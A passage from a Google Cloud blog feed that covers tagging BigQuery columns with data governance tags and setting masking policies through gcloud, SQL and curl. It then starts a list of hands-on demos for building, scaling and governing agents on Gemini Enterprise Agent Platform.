    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Level 1: Create a tag value called &amp;quot;pii&amp;quot;\r\ngcloud resource-manager tags values create pii \\\r\n  --parent=my-governance-project/data_class\r\n\r\n\r\n# Level 2: Create a child value under &amp;quot;pii&amp;quot; for &amp;quot;private&amp;quot; data\r\ngcloud resource-manager tags values create private \\\r\n  --parent=my-governance-project/data_class/pii\r\n\r\n\r\n# Level 3: Create another child tag value for &amp;quot;email&amp;quot; under &amp;quot;private&amp;quot;\r\n# You can go up to 5 levels deep for granular control\r\ngcloud resource-manager tags values create email \\\r\n  --parent=my-governance-project/data_class/private&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab36ab070&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 2: Attach tags to your columns via JSON schema&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Export your existing schema&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For existing tables, the most efficient way to manage tags is by updating the table schema using a JSON file and using API or BQ CLI because it allows you to tag multiple columns at once.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Save the current table schema to a local JSON file.\r\nbq show --schema --format=prettyjson my_project:my_dataset.my_table &amp;gt; schema.json&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab36ab6d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Add the dataGovernanceTags to your JSON file&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Open schema.json and add the tag mapping to your sensitive columns. Note the use of the namespaced key and the short name for the value.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;[\r\n  {\r\n    &amp;quot;name&amp;quot;: &amp;quot;user_email&amp;quot;,\r\n    &amp;quot;type&amp;quot;: &amp;quot;STRING&amp;quot;,\r\n    &amp;quot;dataGovernanceTagsInfo&amp;quot;: {\r\n      &amp;quot;dataGovernanceTags&amp;quot;: {\r\n        &amp;quot;my-governance-project/data_class&amp;quot;: &amp;quot;email&amp;quot; \r\n      }\r\n    }\r\n  },\r\n  {\r\n    &amp;quot;name&amp;quot;: &amp;quot;phone_number&amp;quot;,\r\n    &amp;quot;type&amp;quot;: &amp;quot;STRING&amp;quot;,\r\n    &amp;quot;dataGovernanceTagsInfo&amp;quot;: {\r\n      &amp;quot;dataGovernanceTags&amp;quot;: {\r\n        &amp;quot;my-governance-project/data_class&amp;quot;: &amp;quot;private&amp;quot;\r\n      }\r\n    }\r\n  },\r\n  {\r\n    &amp;quot;name&amp;quot;: &amp;quot;government_id&amp;quot;,\r\n    &amp;quot;type&amp;quot;: &amp;quot;STRING&amp;quot;,\r\n    &amp;quot;dataGovernanceTagsInfo&amp;quot;: {\r\n      &amp;quot;dataGovernanceTags&amp;quot;: {\r\n        &amp;quot;my-governance-project/data_class&amp;quot;: &amp;quot;pii&amp;quot;\r\n      }\r\n    }\r\n  }\r\n]&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab36abdf0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Update the table:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Apply the schema to your BigQuery table.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Overwrite the table schema with your newly tagged JSON file.\r\nbq update --project_id=my-data-project --schema=schema.json my_dataset.my_table&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab36ab580&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alternatively you can also use SQL to bind data governance tags to BigQuery table columns.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;CREATE OR REPLACE TABLE my_dataset.my_table(\r\n  user_email STRING\r\n  OPTIONS (\r\n    data_governance_tags = [(&amp;#x27;my-governance-project/data_class&amp;#x27;, &amp;#x27;email&amp;#x27;)]),\r\n  );\r\nALTER TABLE my_dataset.my_table\r\nALTER COLUMN phone_number\r\n  SET OPTIONS (\r\n    data_governance_tags = [(&amp;#x27;my-governance-project/data_class&amp;#x27;, &amp;#x27;private&amp;#x27;)]);\r\nALTER TABLE my_dataset.my_table\r\nADD COLUMN government_id\r\n  STRING\r\n    OPTIONS (\r\n      data_governance_tags = [(&amp;#x27;my-governance-project/data_class&amp;#x27;, &amp;#x27;pii&amp;#x27;)]);&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab36ab2e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can also remove a column tag by setting it to [], for example:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;ALTER TABLE my_dataset.my_table\r\nALTER COLUMN phone_number\r\n  SET OPTIONS (\r\n    data_governance_tags = []\r\n);&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ac04bfa60&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can use information_schema COLUMNS view to see the columns tags:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT\r\n  column_name,\r\n  data_governance_tags[SAFE_OFFSET(0)].key AS tag_key,\r\n  data_governance_tags[SAFE_OFFSET(0)].value AS tag_value,\r\nFROM `my_project.my_dataset.INFORMATION_SCHEMA.COLUMNS`\r\nWHERE table_name = &amp;#x27;my_table&amp;#x27;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab3b216a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The result is similar to the following:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;+---------------+----------------------------------+-----------+\r\n|  column_name  |            tag_key               | tag_value |\r\n+---------------+----------------------------------+-----------+\r\n| user_email    | my-governance-project/data_class | email     |\r\n| phone_number  | my-governance-project/data_class | private   |\r\n| government_id | NULL                             | NULL      |\r\n+---------------+----------------------------------+-----------+&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab3b21250&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 3: Create data policies&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, define a BigQuery &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;data policy&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; to govern access to these tagged columns. These policies explicitly reference the tag values you attached previously. Note that, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;while data governance tags are global, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;data policies are regional&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To protect your data, the policy must be created in the same region where your BigQuery table is located&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. Once the policy is defined, access is only granted to the specified grantees; all others will be denied access to the sensitive column data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Also, keep in mind that security in BigQuery is layered. For a data policy to be effective, the users (grantees) &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;must first&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; possess base-level access to the table itself (typically via a role like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/bigquery.dataViewer&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;). Data policy then acts as a second security layer, determining whether they view the raw, sensitive column data or a masked, obfuscated version.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Masking policy for ‘pii’ tagged column-data (SHA256 Masking):&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;curl --request POST &amp;quot;https://bigquerydatapolicy.googleapis.com/v2/projects/myProject/locations/us-east1/dataPolicies&amp;quot; \\\r\n  --header &amp;quot;Authorization: Bearer $(gcloud auth print-access-token)&amp;quot; \\\r\n  --header \&amp;#x27;Accept: application/json\&amp;#x27; \\\r\n  --header \&amp;#x27;Content-Type: application/json\&amp;#x27; \\\r\n  --data \&amp;#x27;{\r\n  &amp;quot;dataPolicy&amp;quot;: {\r\n    &amp;quot;dataPolicyType&amp;quot;: &amp;quot;DATA_MASKING_POLICY&amp;quot;,\r\n    &amp;quot;dataMaskingPolicy&amp;quot;: { &amp;quot;predefinedExpression&amp;quot;: &amp;quot;SHA256&amp;quot; },\r\n    &amp;quot;grantees&amp;quot;: [ &amp;quot;principalSet://goog/group/grp-sales@corp.com&amp;quot; ],\r\n    &amp;quot;dataGovernanceTag&amp;quot;: { &amp;quot;key&amp;quot;: &amp;quot;myProject/data_class&amp;quot;, &amp;quot;value&amp;quot;: &amp;quot;pii&amp;quot; }\r\n  },\r\n  &amp;quot;dataPolicyId&amp;quot;: &amp;quot;masking_policy_for_data_class_pii&amp;quot;\r\n}\&amp;#x27; \\\r\n  --compressed&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab3b21850&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt; Raw access policy for ‘pii’ tagged column-data&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;curl --request POST &amp;quot;https://bigquerydatapolicy.googleapis.com/v2/projects/myProject/locations/us-east1/dataPolicies&amp;quot; \\\r\n  --header &amp;quot;Authorization: Bearer $(gcloud auth print-access-token)&amp;quot; \\\r\n  --header \&amp;#x27;Accept: application/json\&amp;#x27; \\\r\n  --header \&amp;#x27;Content-Type: application/json\&amp;#x27; \\\r\n  --data \&amp;#x27;{\r\n  &amp;quot;dataPolicy&amp;quot;: {\r\n    &amp;quot;dataPolicyType&amp;quot;: &amp;quot;RAW_DATA_ACCESS_POLICY&amp;quot;,\r\n    &amp;quot;grantees&amp;quot;: [ &amp;quot;principal://goog/subject/abc@xyz.com&amp;quot; ],\r\n    &amp;quot;dataGovernanceTag&amp;quot;: { &amp;quot;key&amp;quot;: &amp;quot;myProject/data_class&amp;quot;, &amp;quot;value&amp;quot;: &amp;quot;pii&amp;quot; }\r\n  },\r\n  &amp;quot;dataPolicyId&amp;quot;: &amp;quot;raw_access_policy_data_class_pii&amp;quot;\r\n}\&amp;#x27; \\\r\n  --compressed&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab3b217f0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Masking policy for “private” tagged column data (NULL Masking):&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;curl --request POST &amp;quot;https://bigquerydatapolicy.googleapis.com/v2/projects/myProject/locations/us-east1/dataPolicies&amp;quot; \\\r\n  --header &amp;quot;Authorization: Bearer $(gcloud auth print-access-token)&amp;quot; \\\r\n  --header \&amp;#x27;Accept: application/json\&amp;#x27; \\\r\n  --header \&amp;#x27;Content-Type: application/json\&amp;#x27; \\\r\n  --data \&amp;#x27;{\r\n  &amp;quot;dataPolicy&amp;quot;: {\r\n    &amp;quot;dataPolicyType&amp;quot;: &amp;quot;DATA_MASKING_POLICY&amp;quot;,\r\n    &amp;quot;dataMaskingPolicy&amp;quot;: { &amp;quot;predefinedExpression&amp;quot;: &amp;quot;ALWAYS_NULL&amp;quot; },\r\n    &amp;quot;grantees&amp;quot;: [ &amp;quot;principal://goog/subject/abc@xyz.com&amp;quot; ],\r\n    &amp;quot;dataGovernanceTag&amp;quot;: { &amp;quot;key&amp;quot;: &amp;quot;myProject/data_class&amp;quot;, &amp;quot;value&amp;quot;: &amp;quot;private&amp;quot; }\r\n  },\r\n  &amp;quot;dataPolicyId&amp;quot;: &amp;quot;null_policy_data_class_private&amp;quot;\r\n}\&amp;#x27; \\\r\n  --compressed&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab3c51a30&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With these three steps, your column data is now protected. The next time a principal queries your BigQuery table, our authorization engine automatically evaluates their identity against your data policies. If the principal is part of the policy, they get to see the masked or raw data as per the policy; if they are not, then they will be denied access. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data governance tags are a powerful new tool to enhance your data security and governance strategy in BigQuery. We are continuously working to enhance data governance capabilities in BigQuery. Future updates include support for using SQL to create tags and tag based policies, ability to attach multiple tags to a single column,  ability to define policies based on combinations of tags, and deeper integrations with services like Knowledge Catalog.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can start tagging your columns and defining fine-grained access controls at scale. To learn more, dive into the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/tags#data-governance-tags"&gt;&lt;span style="vertical-align: baseline;"&gt;Data Governance Tags documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/level-up-your-column-level-security-using-iam-data-governance-tags-in-bigquery" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-17T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/13-demos-on-gemini-enterprise-agent-platform</id>
    <title>13 hands-on demos to build on Gemini Enterprise Agent Platform</title>
    <updated>2026-07-17T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Earlier this year, we introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, where you can build, scale, govern, and optimize agents. Today, we’re sharing 13 demos that walk you through what Agent Platform can do. Each one teaches a concept, a pattern, or an architecture you can put to work immediately.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The best part? You don't have to follow them step-by-step. Install &lt;/span&gt;&lt;a href="https://google.github.io/agents-cli/guide/getting-started/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agents CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; into your favorite coding agent (Antigravity, Claude Code, Codex, whatever you use) and it instantly gets seven skills that make it an expert in ADK and Agent Platform. Describe what you want to build in plain English, and your coding agent scaffolds, evaluates, deploys, and monitors the agent for you. You’ll never have to leave your editor.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s dive in!&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Build AI agents&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These demos are all built on the code-first ADK. They start at the foundation and work up.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Start here: build your first agent with ADK.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/devsite/codelabs/build-agents-with-adk-foundation" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ADK Foundation codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is your perfect on-ramp. You set up your environment, define a basic conversational agent powered by Gemini, configure its settings, and test it through both a command-line interface and a web UI. If you've never touched ADK before, do this one first.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Build an event-driven approval agent with human-in-the-loop.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/vibecode-ambient-expense-agent" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ambient expense agent codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is the most complete "Agent Platform in action" demo in the set. You build a corporate expense agent using ADK 2.0's graph-based workflow API. Expenses under a threshold get auto-approved in plain Python. Anything above goes through a pre-LLM security screen (PII redaction, prompt-injection defense), passes a Gemini compliance analysis, and pauses for a human-in-the-loop review before anything is finalized. You mount it behind FastAPI, trigger it from Pub/Sub events, and grade it with an LLM-as-judge eval. Keep this agent in mind – it comes back in the Scale and Govern sections.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Connect agents to your data with the Model Context Protocol.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/next26/adk-mcp-tools" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;MCP codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; shows you how to build reusable MCP tools that let Gemini query BigQuery, search files, and call APIs. MCP is an open protocol, so the tools you build work across different vendors and frameworks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4. Build a dynamic frontend with Agent-to-UI (A2UI).&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The best user experiences are highly visual. The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/next26/adk-a2ui" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;A2UI codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; shows you how to build an agent that renders real interface components (layouts, charts, interactive menus) that update dynamically in real time as the conversation flows. The agent literally assembles the UI the user needs, on the fly.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Scale AI agents&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A prototype on your laptop is one thing. Handling production traffic, memory, and orchestration is what comes next.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;5. Deploy a stateful data science agent to Agent Runtime (formerly known as Agent Engine).&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/next26/adk-deploy-scale#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Stateful Data Science Agent&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; codelab walks you through building a BigQuery agent that remembers user preferences across sessions via Memory Bank, then deploying it directly to Agent Runtime. All of the underlying infrastructure, scaling, and session management are handled for you automatically.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;6. Build long-running agents that pause, resume, and never lose context.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Building an agent that responds to a single prompt is easy, but real enterprise workflows often take days or weeks to complete. This &lt;/span&gt;&lt;a href="https://developers.googleblog.com/build-long-running-ai-agents-that-pause-resume-and-never-lose-context-with-adk/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tutorial&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; walks through building agents that run reliably for weeks. You'll learn three architectural patterns: durable state machines, event-driven idle time handling, and checkpoint-and-resume with persistent sessions. The example is an onboarding coordinator agent that survives container restarts and picks up exactly where it left off.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;7. Deploy an ambient expense agent to Agent Runtime with the Agents CLI.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Remember the expense agent from the Build section? The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/enterprise-cloud-scale-deploying-the-expense-agent-to-agent-runtime-on-google-cloud" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Deploy to Agent Runtime codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; picks up that agent and takes it to production. You scaffold your deployment config with the Agents CLI, preview it with a dry run, then deploy it live. Cloud Trace, Cloud Logging, and BigQuery Agent Analytics wire in automatically, and the agent auto-registers in Agent Registry, so it’s discoverable across your org the moment it goes live.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;8. Give your production agent a real front end.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/vibecode-frontend-with-antigravity" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;frontend codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is where everything comes together. You build a manager dashboard on Cloud Run, connect it to Agent Runtime through an OIDC-authenticated Pub/Sub pipeline, and give managers the ability to resume paused human-in-the-loop sessions from the browser. It ties the expense agent and the deployment together into a complete end-to-end enterprise architecture.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Govern AI agents&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Scaling agents across an organization requires a system of built-in guardrails to manage access, track endpoints, and filter traffic.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;9. Secure your agent's lifecycle from the first commit.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/secure-agentic-coding" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Secure Agentic Coding codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; shows you how to build a shopping assistant test-first with test-driven development (TDD), wire in a custom STRIDE threat model, set up a Semgrep pre-commit hook, and configure a PreToolUse gate that blocks risky actions before execution. You deliberately plant a hardcoded API key, and the agent catches and fixes it the moment the hook fires.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;10. Control agent access with Agent Gateway.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/cloudnet-agent-gateway" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Gateway codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; covers runtime governance. You deploy a multi-tool ADK agent on Agent Runtime that calls MCP servers on Cloud Run through Agent Gateway. Each agent gets a unique identity with end-to-end mTLS. Every outbound call goes through IAP authentication and IAM authorization. On top of that, Model Armor inspects all content for prompt injection and data leakage. It’s a complete, production-grade governance stack in one demo.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Optimize AI agents&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Shipping an agent is the start. The hard part is knowing whether your next prompt tweak actually makes it better or quietly breaks ten other things. Agent Platform gives you the tools to close that loop.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;11. Drive the agent quality flywheel from your coding agent.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You tweaked a prompt. It looks better on three examples, but did you just break ten others? This &lt;/span&gt;&lt;a href="https://developers.googleblog.com/driving-the-agent-quality-flywheel-from-your-coding-agent/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tutorial&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; introduces a five-stage evaluation flywheel you run directly from your coding agent: prepare data (from OTel traces, hand-crafted cases, or synthesized scenarios), run inference, grade with Google's adaptive AutoRaters, analyze failure clusters, and execute targeted optimizations. The AutoRaters are built on the same principles Google uses to evaluate its own models and first-party agents, developed in partnership with DeepMind. Describe what you want measured in plain language. Your coding agent picks up the rest.&lt;/span&gt;&lt;/p&gt;
